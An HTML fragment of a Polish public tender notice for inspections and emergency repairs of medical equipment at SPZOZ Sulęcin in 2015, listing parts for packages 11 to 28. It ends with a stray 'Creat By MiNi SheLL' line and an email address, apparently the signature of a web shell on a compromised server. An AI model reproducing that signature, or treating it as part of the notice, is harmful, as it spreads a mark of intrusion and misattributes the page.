<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi w zakresie  wykonywania okresowych przeglądów technicznych i napraw awaryjnych sprzętów i urządzeń  medycznych  podzielonych  na 28 pakietów wyszczególnionych w załączniku nr 1a do SIWZ  na terenie działalności SPZOZ w Sulęcinie w 2015 roku- Pakiet nr 11.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Usługi w zakresie  wykonywania okresowych przeglądów technicznych i napraw awaryjnych sprzętów i urządzeń  medycznych  podzielonych  na 28 pakietów wyszczególnionych w załączniku nr 1a do SIWZ  na terenie działalności SPZOZ w Sulęcinie w 2015 roku  -Pakiet nr 12.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi w zakresie  wykonywania okresowych przeglądów technicznych i napraw awaryjnych sprzętów i urządzeń  medycznych  podzielonych  na 28 pakietów wyszczególnionych w załączniku nr 1a do SIWZ  na terenie działalności SPZOZ w Sulęcinie w 2015 roku - Pakiet nr 12.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Usługi w zakresie  wykonywania okresowych przeglądów technicznych i napraw awaryjnych sprzętów i urządzeń  medycznych  podzielonych  na 28 pakietów wyszczególnionych w załączniku nr 1a do SIWZ  na terenie działalności SPZOZ w Sulęcinie w 2015 roku - Pakiet nr 13.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi w zakresie  wykonywania okresowych przeglądów technicznych i napraw awaryjnych sprzętów i urządzeń  medycznych  podzielonych  na 28 pakietów wyszczególnionych w załączniku nr 1a do SIWZ  na terenie działalności SPZOZ w Sulęcinie w 2015 roku - Pakiet nr 13.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Usługi w zakresie  wykonywania okresowych przeglądów technicznych i napraw awaryjnych sprzętów i urządzeń  medycznych  podzielonych  na 28 pakietów wyszczególnionych w załączniku nr 1a do SIWZ  na terenie działalności SPZOZ w Sulęcinie w 2015 roku - Pakiet nr 15.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi w zakresie  wykonywania okresowych przeglądów technicznych i napraw awaryjnych sprzętów i urządzeń  medycznych  podzielonych  na 28 pakietów wyszczególnionych w załączniku nr 1a do SIWZ  na terenie działalności SPZOZ w Sulęcinie w 2015 roku - Pakiet nr 15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Usługi w zakresie  wykonywania okresowych przeglądów technicznych i napraw awaryjnych sprzętów i urządzeń  medycznych  podzielonych  na 28 pakietów wyszczególnionych w załączniku nr 1a do SIWZ  na terenie działalności SPZOZ w Sulęcinie w 2015 roku - Pakiet nr 16.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi w zakresie  wykonywania okresowych przeglądów technicznych i napraw awaryjnych sprzętów i urządzeń  medycznych  podzielonych  na 28 pakietów wyszczególnionych w załączniku nr 1a do SIWZ  na terenie działalności SPZOZ w Sulęcinie w 2015 roku - Pakiet nr 16.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Usługi w zakresie  wykonywania okresowych przeglądów technicznych i napraw awaryjnych sprzętów i urządzeń  medycznych  podzielonych  na 28 pakietów wyszczególnionych w załączniku nr 1a do SIWZ  na terenie działalności SPZOZ w Sulęcinie w 2015 roku - Pakiet nr 17.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi w zakresie  wykonywania okresowych przeglądów technicznych i napraw awaryjnych sprzętów i urządzeń  medycznych  podzielonych  na 28 pakietów wyszczególnionych w załączniku nr 1a do SIWZ  na terenie działalności SPZOZ w Sulęcinie w 2015 roku - Pakiet nr 17.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Usługi w zakresie  wykonywania okresowych przeglądów technicznych i napraw awaryjnych sprzętów i urządzeń  medycznych  podzielonych  na 28 pakietów wyszczególnionych w załączniku nr 1a do SIWZ  na terenie działalności SPZOZ w Sulęcinie w 2015 roku - Pakiet nr 18.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi w zakresie  wykonywania okresowych przeglądów technicznych i napraw awaryjnych sprzętów i urządzeń  medycznych  podzielonych  na 28 pakietów wyszczególnionych w załączniku nr 1a do SIWZ  na terenie działalności SPZOZ w Sulęcinie w 2015 roku- Pakiet nr 18.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Usługi w zakresie  wykonywania okresowych przeglądów technicznych i napraw awaryjnych sprzętów i urządzeń  medycznych  podzielonych  na 28 pakietów wyszczególnionych w załączniku nr 1a do SIWZ  na terenie działalności SPZOZ w Sulęcinie w 2015 roku - Pakiet nr 19.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi w zakresie  wykonywania okresowych przeglądów technicznych i napraw awaryjnych sprzętów i urządzeń  medycznych  podzielonych  na 28 pakietów wyszczególnionych w załączniku nr 1a do SIWZ  na terenie działalności SPZOZ w Sulęcinie w 2015 roku - Pakiet nr 19.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Usługi w zakresie  wykonywania okresowych przeglądów technicznych i napraw awaryjnych sprzętów i urządzeń  medycznych  podzielonych  na 28 pakietów wyszczególnionych w załączniku nr 1a do SIWZ  na terenie działalności SPZOZ w Sulęcinie w 2015 roku - Pakiet nr 20.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi w zakresie  wykonywania okresowych przeglądów technicznych i napraw awaryjnych sprzętów i urządzeń  medycznych  podzielonych  na 28 pakietów wyszczególnionych w załączniku nr 1a do SIWZ  na terenie działalności SPZOZ w Sulęcinie w 2015 roku - Pakiet nr 20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Usługi w zakresie  wykonywania okresowych przeglądów technicznych i napraw awaryjnych sprzętów i urządzeń  medycznych  podzielonych  na 28 pakietów wyszczególnionych w załączniku nr 1a do SIWZ  na terenie działalności SPZOZ w Sulęcinie w 2015 roku - Pakiet nr 21.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi w zakresie  wykonywania okresowych przeglądów technicznych i napraw awaryjnych sprzętów i urządzeń  medycznych  podzielonych  na 28 pakietów wyszczególnionych w załączniku nr 1a do SIWZ  na terenie działalności SPZOZ w Sulęcinie w 2015 roku- Pakiet nr 21.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Usługi w zakresie  wykonywania okresowych przeglądów technicznych i napraw awaryjnych sprzętów i urządzeń  medycznych  podzielonych  na 28 pakietów wyszczególnionych w załączniku nr 1a do SIWZ  na terenie działalności SPZOZ w Sulęcinie w 2015 roku - Pakiet nr 23.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi w zakresie  wykonywania okresowych przeglądów technicznych i napraw awaryjnych sprzętów i urządzeń  medycznych  podzielonych  na 28 pakietów wyszczególnionych w załączniku nr 1a do SIWZ  na terenie działalności SPZOZ w Sulęcinie w 2015 roku - Pakiet nr 23.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Usługi w zakresie  wykonywania okresowych przeglądów technicznych i napraw awaryjnych sprzętów i urządzeń  medycznych  podzielonych  na 28 pakietów wyszczególnionych w załączniku nr 1a do SIWZ  na terenie działalności SPZOZ w Sulęcinie w 2015 roku - pakiet nr 24.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi w zakresie  wykonywania okresowych przeglądów technicznych i napraw awaryjnych sprzętów i urządzeń  medycznych  podzielonych  na 28 pakietów wyszczególnionych w załączniku nr 1a do SIWZ  na terenie działalności SPZOZ w Sulęcinie w 2015 roku - pakiet nr 24.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Usługi w zakresie  wykonywania okresowych przeglądów technicznych i napraw awaryjnych sprzętów i urządzeń  medycznych  podzielonych  na 28 pakietów wyszczególnionych w załączniku nr 1a do SIWZ  na terenie działalności SPZOZ w Sulęcinie w 2015 roku - Pakiet nr 25.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi w zakresie  wykonywania okresowych przeglądów technicznych i napraw awaryjnych sprzętów i urządzeń  medycznych  podzielonych  na 28 pakietów wyszczególnionych w załączniku nr 1a do SIWZ  na terenie działalności SPZOZ w Sulęcinie w 2015 roku - pakiet nr 25.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Usługi w zakresie  wykonywania okresowych przeglądów technicznych i napraw awaryjnych sprzętów i urządzeń  medycznych  podzielonych  na 28 pakietów wyszczególnionych w załączniku nr 1a do SIWZ  na terenie działalności SPZOZ w Sulęcinie w 2015 roku - Pakiet nr 26.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi w zakresie  wykonywania okresowych przeglądów technicznych i napraw awaryjnych sprzętów i urządzeń  medycznych  podzielonych  na 28 pakietów wyszczególnionych w załączniku nr 1a do SIWZ  na terenie działalności SPZOZ w Sulęcinie w 2015 roku - pakiet nr 26.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Usługi w zakresie  wykonywania okresowych przeglądów technicznych i napraw awaryjnych sprzętów i urządzeń  medycznych  podzielonych  na 28 pakietów wyszczególnionych w załączniku nr 1a do SIWZ  na terenie działalności SPZOZ w Sulęcinie w 2015 roku- Pakiet nr 27.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi w zakresie  wykonywania okresowych przeglądów technicznych i napraw awaryjnych sprzętów i urządzeń  medycznych  podzielonych  na 28 pakietów wyszczególnionych w załączniku nr 1a do SIWZ  na terenie działalności SPZOZ w Sulęcinie w 2015 roku - pakiet nr 27.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Usługi w zakresie  wykonywania okresowych przeglądów technicznych i napraw awaryjnych sprzętów i urządzeń  medycznych  podzielonych  na 28 pakietów wyszczególnionych w załączniku nr 1a do SIWZ  na terenie działalności SPZOZ w Sulęcinie w 2015 roku - Pakiet nr 28.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi w zakresie  wykonywania okresowych przeglądów technicznych i napraw awaryjnych sprzętów i urządzeń  medycznych  podzielonych  na 28 pakietów wyszczególnionych w załączniku nr 1a do SIWZ  na terenie działalności SPZOZ w Sulęcinie w 2015 roku - Pakiet nr 28.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com